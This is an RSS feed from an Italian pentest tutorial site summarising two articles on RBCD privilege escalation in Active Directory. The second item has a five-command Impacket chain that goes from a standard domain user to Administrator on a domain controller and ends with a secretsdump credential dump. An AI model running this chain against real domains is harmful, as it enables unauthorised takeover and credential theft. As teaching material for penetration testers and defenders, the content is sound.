<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Rbcd on Ethical Hacking | Pentest e Sicurezza Informatica | Hackita</title><link>https://hackita.it/tags/rbcd/</link><description>Recent content in Rbcd on Ethical Hacking | Pentest e Sicurezza Informatica | Hackita</description><generator>Hugo</generator><language>it</language><lastBuildDate>Sun, 12 Jul 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://hackita.it/tags/rbcd/index.xml" rel="self" type="application/rss+xml"/><item><title>RBCD Attack : Resource-Based Constrained Delegation PrivEsc</title><link>https://hackita.it/articoli/rbcd/</link><pubDate>Sun, 12 Jul 2026 00:00:00 +0000</pubDate><guid>https://hackita.it/articoli/rbcd/</guid><description>&lt;h1
 id="resource-based-constrained-delegation-da-genericwrite-a-domain-admin" class="group/anchor-heading"&gt;
 Resource-Based Constrained Delegation: Da GenericWrite a Domain Admin
 &lt;a href="#resource-based-constrained-delegation-da-genericwrite-a-domain-admin" class="text-inherit opacity-0 group-hover/anchor-heading:opacity-100 decoration-transparent"&gt;#&lt;/a&gt;
&lt;/h1&gt;&lt;p&gt;RBCD sfrutta write access sull&amp;rsquo;attributo &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; di un computer target. Scrivi il SID di un account che controlli, poi usi S4U2Self + S4U2Proxy per ottenere un TGS come Administrator su quel computer — senza toccare krbtgt, senza DCSync diretto.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;La Resource-Based Constrained Delegation (RBCD) è stata introdotta in Windows Server 2012 R2 e permette a un computer di dichiarare quali account possono autenticarsi per suo conto. L&amp;rsquo;attributo che controlla questo comportamento — &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; — è scrivibile da chiunque abbia &lt;code&gt;GenericWrite&lt;/code&gt;, &lt;code&gt;GenericAll&lt;/code&gt; o &lt;code&gt;WriteProperty&lt;/code&gt; sull&amp;rsquo;oggetto computer target.&lt;/p&gt;</description></item><item><title>SeMachineAccountQuota e RBCD: Privesc a Domain Admin in 5 comandi</title><link>https://hackita.it/articoli/semachineaccountquota/</link><pubDate>Thu, 25 Jun 2026 00:00:00 +0000</pubDate><guid>https://hackita.it/articoli/semachineaccountquota/</guid><description>&lt;h1
 id="semachineaccountprivilege-e-rbcd-da-utente-di-dominio-a-domain-admin-in-cinque-comandi" class="group/anchor-heading"&gt;
 SeMachineAccountPrivilege e RBCD: Da Utente di Dominio a Domain Admin in Cinque Comandi
 &lt;a href="#semachineaccountprivilege-e-rbcd-da-utente-di-dominio-a-domain-admin-in-cinque-comandi" class="text-inherit opacity-0 group-hover/anchor-heading:opacity-100 decoration-transparent"&gt;#&lt;/a&gt;
&lt;/h1&gt;&lt;p&gt;Hai credenziali di un utente di dominio standard. Zero privilegi speciali. Il MachineAccountQuota è 10 (default nella maggioranza dei domini). Con Impacket crei un computer account, configuri RBCD sul DC, richiedi un ticket S4U come Administrator: accesso al DC in cinque comandi.&lt;/p&gt;
&lt;hr&gt;
&lt;h2
 id="quick-exploit" class="group/anchor-heading"&gt;
 Quick Exploit
 &lt;a href="#quick-exploit" class="text-inherit opacity-0 group-hover/anchor-heading:opacity-100 decoration-transparent"&gt;#&lt;/a&gt;
&lt;/h2&gt;

&lt;div class="shadow-xl border border-primary h-fit rounded-md"&gt;
 &lt;div 
 class="w-full rounded-t-md py-3 px-[0.8571429em] header-glass flex justify-between items-center"&gt;
 &lt;div class="flex gap-x-2"&gt;
 &lt;span class="size-3 bg-red-500 rounded-full"&gt;&lt;/span&gt;
 &lt;span class="size-3 bg-yellow-500 rounded-full"&gt;&lt;/span&gt;
 &lt;span class="size-3 bg-green-500 rounded-full"&gt;&lt;/span&gt;
 &lt;/div&gt;
 &lt;span class="uppercase text-sm"&gt;bash&lt;/span&gt;
 &lt;/div&gt;
 &lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;python3 addcomputer.py CORP.LOCAL/normaluser:Password123 -computer-name HACKITA$ -computer-pass CompP@ss123! -dc-ip 192.168.1.10
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;python3 rbcd.py CORP.LOCAL/normaluser:Password123 -action write -delegate-to &lt;span class="s2"&gt;&amp;#34;DC01&lt;/span&gt;$&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt; -delegate-from &lt;span class="s2"&gt;&amp;#34;HACKITA&lt;/span&gt;$&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt; -dc-ip 192.168.1.10
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;python3 getST.py CORP.LOCAL/HACKITA&lt;span class="se"&gt;\$&lt;/span&gt;:CompP@ss123! -spn cifs/DC01.CORP.LOCAL -impersonate Administrator -dc-ip 192.168.1.10
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;export&lt;/span&gt; &lt;span class="nv"&gt;KRB5CCNAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Administrator.ccache
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;python3 secretsdump.py -k -no-pass CORP.LOCAL/Administrator@DC01.CORP.LOCAL&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Output atteso:&lt;/p&gt;</description></item></channel></rss>